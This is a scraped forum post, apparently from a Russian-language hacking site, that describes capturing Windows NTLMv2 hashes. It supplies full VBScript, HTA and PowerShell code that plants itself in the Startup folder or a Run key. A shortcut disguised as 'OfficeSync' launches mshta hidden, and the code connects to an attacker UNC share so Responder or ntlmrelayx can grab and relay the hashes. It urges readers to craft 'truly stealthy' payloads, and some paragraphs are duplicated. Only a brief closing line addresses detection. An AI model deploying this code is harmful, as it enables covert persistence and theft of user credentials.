stihl не предоставил(а) никакой дополнительной информации.
Because you still need to drop a script on the target machine (for example, by tricking a user into running a payload or planting it via social engineering), is not considered 0 click so no CVE.
Once you’ve done that, however, it runs entirely in the background and harvests NTLMv2 hashes without any further prompts.
Capture the hash
The VBScript code leverages a combination of COM objects — Shell.Application, Scripting.FileSystemObject, and MSXML2.XMLHTTP-to initiate outbound connections that can trigger NTLM authentication attempts. While this example is written in VBScript, similar techniques can be implemented in other languages that support COM automation.
Get creative — mix and match .lnk, .vbs, .ps1 (or any combination of them) to craft a truly stealthy payload.
или Зарегистрируйся
Once you’ve done that, however, it runs entirely in the background and harvests NTLMv2 hashes without any further prompts.
Why It Works
- Native auto-execution: Leverage login-time paths Windows trusts by default (Startup folder, Run-registry key).
- Built-in COM objects: No exotic payloads or deprecated file types needed — just Shell.Application, Scripting.FileSystemObject and MSXML2.XMLHTTP and more COM objects.
- Automatic NTLM auth: When your script points at a UNC share, Windows immediately tries to authenticate with NTLMv2.
Attack Flow
1. Plant your script
- Copy your .vbs (or .ps1) into the user’s Startup folder
- Or add a HKCU\…\Run registry entry
2. Instantiate COM components
Код:
Set sh = CreateObject("Shell.Application")
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("MSXML2.XMLHTTP")3. Trigger a UNC connection
Код:
sh.NameSpace "\\attacker-server\share"
http.Open "GET", "\\attacker-server\ping", False
http.SendCapture the hash
- Windows automatically negotiates NTLMv2 when accessing \\attacker-server\…
- Attacker runs Responder, ntlmrelayx, or similar to grab and relay the hash
You can be really creative with your payload:
Copy-Item .\ntlmleak.vbs “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup”
Код:
<job>
<script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxx\leak"
Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker
Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1
Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send
</script>
</job>The VBScript code leverages a combination of COM objects — Shell.Application, Scripting.FileSystemObject, and MSXML2.XMLHTTP-to initiate outbound connections that can trigger NTLM authentication attempts. While this example is written in VBScript, similar techniques can be implemented in other languages that support COM automation.
Get creative — mix and match .lnk, .vbs, .ps1 (or any combination of them) to craft a truly stealthy payload.
Код:
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\OfficeSync.lnk")
$Shortcut.TargetPath = "mshta.exe"
$Shortcut.Arguments = "\\xxxxxxxxx\leak\leak.hta"
$Shortcut.WindowStyle = 7 # Hidden
$Shortcut.IconLocation = "shell32.dll, 13"
$Shortcut.Save()
Код:
<html>
<head>
<HTA:APPLICATION ID="NTLMLeak" APPLICATIONNAME="NTLMLeak" BORDER="thin" />
<script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxxxxx\leak"
' Shell COM object (triggers share access)
Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker
' FileSystemObject COM
Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1
' MSXML2
Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send
' IE COM nav to UNC path
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "file://" & attacker & "\xaml.xaml"
' Cleanup
Set sh = Nothing
Set fso = Nothing
Set http = Nothing
Set ie = Nothing
</script>
</head>
<body>
<h1>Loading...</h1>
</body>
</html>Why You Care
- Red-Team POV: Reliable persistence + credential grab in one step — no click-through dialogs, no Office macros.
- Blue-Team POV: Prioritize detection on creation of unexpected Run-keys/Startup scripts and unusual SMB outbound attempts at user logon.